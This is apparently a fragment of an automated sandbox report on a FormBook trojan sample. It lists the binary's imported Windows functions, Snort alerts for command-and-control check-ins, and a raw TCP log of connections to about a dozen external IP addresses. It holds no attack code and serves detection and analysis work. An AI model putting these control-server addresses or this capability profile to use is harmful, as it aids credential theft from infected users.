keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishGreat Britain

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      07/02/24-07:16:54.138571TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973080192.168.2.5194.9.94.85
                      07/02/24-07:17:39.655226TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.5199.192.19.19
                      07/02/24-07:18:22.648730TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.5194.58.112.174
                      07/02/24-07:17:53.138400TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974180192.168.2.5213.145.228.16
                      07/02/24-07:15:37.719521TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971280192.168.2.5217.160.0.106
                      07/02/24-07:16:40.545082TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972680192.168.2.543.252.167.188
                      07/02/24-07:17:05.560896TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.523.251.54.212
                      07/02/24-07:15:40.247293TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971380192.168.2.5217.160.0.106
                      07/02/24-07:16:15.340972TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972280192.168.2.5208.91.197.27
                      07/02/24-07:17:42.185389TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973880192.168.2.5199.192.19.19
                      07/02/24-07:16:51.569315TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972980192.168.2.5194.9.94.85
                      07/02/24-07:18:06.490979TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974580192.168.2.591.195.240.19
                      07/02/24-07:18:36.061329TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.5172.67.210.102
                      07/02/24-07:15:53.606736TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971880192.168.2.5142.250.181.243
                      07/02/24-07:16:12.803259TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.5208.91.197.27
                      07/02/24-07:16:38.017253TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972580192.168.2.543.252.167.188
                      07/02/24-07:17:55.674478TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.5213.145.228.16
                      07/02/24-07:18:09.029321TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.591.195.240.19
                      07/02/24-07:18:33.529295TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975380192.168.2.5172.67.210.102
                      07/02/24-07:18:19.901548TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974980192.168.2.5194.58.112.174
                      07/02/24-07:17:08.093244TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973480192.168.2.523.251.54.212
                      07/02/24-07:15:51.064470TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971780192.168.2.5142.250.181.243

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 2, 2024 07:15:21.964560032 CEST4971180192.168.2.55.44.111.162
                      Jul 2, 2024 07:15:21.969361067 CEST80497115.44.111.162192.168.2.5
                      Jul 2, 2024 07:15:21.969449997 CEST4971180192.168.2.55.44.111.162
                      Jul 2, 2024 07:15:21.971903086 CEST4971180192.168.2.55.44.111.162
                      Jul 2, 2024 07:15:21.976646900 CEST80497115.44.111.162192.168.2.5
                      Jul 2, 2024 07:15:22.647814035 CEST80497115.44.111.162192.168.2.5
                      Jul 2, 2024 07:15:22.647872925 CEST80497115.44.111.162192.168.2.5
                      Jul 2, 2024 07:15:22.647980928 CEST4971180192.168.2.55.44.111.162
                      Jul 2, 2024 07:15:22.651257992 CEST4971180192.168.2.55.44.111.162
                      Jul 2, 2024 07:15:22.656110048 CEST80497115.44.111.162192.168.2.5
                      Jul 2, 2024 07:15:37.712788105 CEST4971280192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:37.717639923 CEST8049712217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:37.717807055 CEST4971280192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:37.719521046 CEST4971280192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:37.724347115 CEST8049712217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:38.378916979 CEST8049712217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:38.378983974 CEST8049712217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:38.381222963 CEST4971280192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:39.221720934 CEST4971280192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:40.240366936 CEST4971380192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:40.245264053 CEST8049713217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:40.245340109 CEST4971380192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:40.247292995 CEST4971380192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:40.252046108 CEST8049713217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:40.896181107 CEST8049713217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:40.896356106 CEST8049713217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:40.896405935 CEST4971380192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:41.752990007 CEST4971380192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:42.771161079 CEST4971480192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:42.776210070 CEST8049714217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:42.776285887 CEST4971480192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:42.777931929 CEST4971480192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:42.782738924 CEST8049714217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:42.782852888 CEST8049714217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:43.489996910 CEST8049714217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:43.490042925 CEST8049714217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:43.490299940 CEST4971480192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:44.284212112 CEST4971480192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:45.302855968 CEST4971580192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:45.307804108 CEST8049715217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:45.307871103 CEST4971580192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:45.309660912 CEST4971580192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:45.314429998 CEST8049715217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:45.979480028 CEST8049715217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:45.980102062 CEST8049715217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:45.980216980 CEST4971580192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:45.982912064 CEST4971580192.168.2.5217.160.0.106
                      Jul 2, 2024 07:15:45.987679958 CEST8049715217.160.0.106192.168.2.5
                      Jul 2, 2024 07:15:51.049171925 CEST4971780192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:51.053987980 CEST8049717142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:51.054064035 CEST4971780192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:51.064470053 CEST4971780192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:51.069283009 CEST8049717142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:51.796833038 CEST8049717142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:51.796952009 CEST8049717142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:51.797017097 CEST4971780192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:52.581192970 CEST4971780192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:53.599885941 CEST4971880192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:53.604722977 CEST8049718142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:53.604813099 CEST4971880192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:53.606735945 CEST4971880192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:53.611479998 CEST8049718142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:54.344156981 CEST8049718142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:54.344448090 CEST8049718142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:54.344511032 CEST4971880192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:55.112440109 CEST4971880192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:56.131449938 CEST4971980192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:56.136321068 CEST8049719142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:56.136411905 CEST4971980192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:56.138314962 CEST4971980192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:56.143198013 CEST8049719142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:56.143788099 CEST8049719142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:56.881730080 CEST8049719142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:56.882047892 CEST8049719142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:56.883096933 CEST4971980192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:57.643615007 CEST4971980192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:58.662709951 CEST4972080192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:58.667534113 CEST8049720142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:58.671097994 CEST4972080192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:58.672972918 CEST4972080192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:58.677721024 CEST8049720142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:59.457211018 CEST8049720142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:59.457402945 CEST8049720142.250.181.243192.168.2.5
                      Jul 2, 2024 07:15:59.457473993 CEST4972080192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:59.469746113 CEST4972080192.168.2.5142.250.181.243
                      Jul 2, 2024 07:15:59.474473953 CEST8049720142.250.181.243192.168.2.5
                      Jul 2, 2024 07:16:12.796459913 CEST4972180192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:12.801278114 CEST8049721208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:12.801363945 CEST4972180192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:12.803258896 CEST4972180192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:12.808013916 CEST8049721208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:14.315489054 CEST4972180192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:14.364931107 CEST8049721208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:15.334151030 CEST4972280192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:15.339015961 CEST8049722208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:15.339112043 CEST4972280192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:15.340971947 CEST4972280192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:15.345736027 CEST8049722208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:16.847007990 CEST4972280192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:16.893227100 CEST8049722208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:17.865627050 CEST4972380192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:17.870786905 CEST8049723208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:17.873136997 CEST4972380192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:17.877194881 CEST4972380192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:17.881956100 CEST8049723208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:17.882055998 CEST8049723208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:19.381113052 CEST4972380192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:19.429145098 CEST8049723208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:20.505800962 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:20.510662079 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:20.510720968 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:20.513164043 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:20.518771887 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:22.189590931 CEST8049721208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:22.189665079 CEST4972180192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.389334917 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.389693022 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.389705896 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.389719963 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.389724970 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.389729977 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.389791965 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.392970085 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.393011093 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.393066883 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.393078089 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.393119097 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.394567966 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.394680977 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.394715071 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.394821882 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.396972895 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.396998882 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.397007942 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.397010088 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.397043943 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.397238970 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.397363901 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.397408009 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.479841948 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.480015993 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.480026007 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.480094910 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.480189085 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.480232000 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.485543013 CEST4972480192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:24.490334034 CEST8049724208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.739449978 CEST8049722208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:24.739507914 CEST4972280192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:27.383773088 CEST8049723208.91.197.27192.168.2.5
                      Jul 2, 2024 07:16:27.391109943 CEST4972380192.168.2.5208.91.197.27
                      Jul 2, 2024 07:16:38.008687019 CEST4972580192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:38.015301943 CEST804972543.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:38.015439034 CEST4972580192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:38.017252922 CEST4972580192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:38.022012949 CEST804972543.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:38.880425930 CEST804972543.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:38.880508900 CEST804972543.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:38.880556107 CEST4972580192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:39.521218061 CEST4972580192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:40.538000107 CEST4972680192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:40.542797089 CEST804972643.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:40.542872906 CEST4972680192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:40.545082092 CEST4972680192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:40.549853086 CEST804972643.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:41.402642012 CEST804972643.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:41.402934074 CEST804972643.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:41.405302048 CEST4972680192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:42.049854040 CEST4972680192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:43.071136951 CEST4972780192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:43.076143980 CEST804972743.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:43.077238083 CEST4972780192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:43.079508066 CEST4972780192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:43.084316969 CEST804972743.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:43.084407091 CEST804972743.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:44.148407936 CEST804972743.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:44.148534060 CEST804972743.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:44.148585081 CEST4972780192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:44.581186056 CEST4972780192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:45.602205992 CEST4972880192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:45.607028961 CEST804972843.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:45.607183933 CEST4972880192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:45.611141920 CEST4972880192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:45.615998030 CEST804972843.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:46.464256048 CEST804972843.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:46.464276075 CEST804972843.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:46.464370012 CEST4972880192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:46.467469931 CEST4972880192.168.2.543.252.167.188
                      Jul 2, 2024 07:16:46.472255945 CEST804972843.252.167.188192.168.2.5
                      Jul 2, 2024 07:16:51.561328888 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:51.566823959 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:51.567008972 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:51.569314957 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:51.575172901 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215253115 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215310097 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215320110 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215367079 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:52.215553999 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215564966 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215574026 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.215604067 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:52.215620041 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:52.216037035 CEST8049729194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:52.216085911 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:53.115222931 CEST4972980192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.131536961 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.136465073 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.136552095 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.138571024 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.143848896 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.800302982 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.800349951 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.800360918 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.800404072 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.800647020 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.800657034 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.800693035 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.801012993 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.801054955 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:54.801084042 CEST8049730194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:54.801175117 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:55.645298004 CEST4973080192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:56.663101912 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:56.667963982 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:56.668034077 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:56.670464039 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:56.675261021 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:56.675326109 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316021919 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316099882 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316111088 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316344023 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:57.316479921 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316494942 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316796064 CEST8049731194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:57.316824913 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:57.319241047 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:58.174873114 CEST4973180192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.193589926 CEST4973280192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.198982000 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.199103117 CEST4973280192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.203165054 CEST4973280192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.208111048 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.856921911 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.857026100 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.857038021 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.857121944 CEST4973280192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.857423067 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.857435942 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.857445955 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:16:59.857580900 CEST4973280192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.860512972 CEST4973280192.168.2.5194.9.94.85
                      Jul 2, 2024 07:16:59.865207911 CEST8049732194.9.94.85192.168.2.5
                      Jul 2, 2024 07:17:05.553504944 CEST4973380192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:05.558819056 CEST804973323.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:05.559052944 CEST4973380192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:05.560895920 CEST4973380192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:05.565781116 CEST804973323.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:07.065531015 CEST4973380192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:07.117326021 CEST804973323.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:08.083993912 CEST4973480192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:08.088859081 CEST804973423.251.54.212192.168.2.5
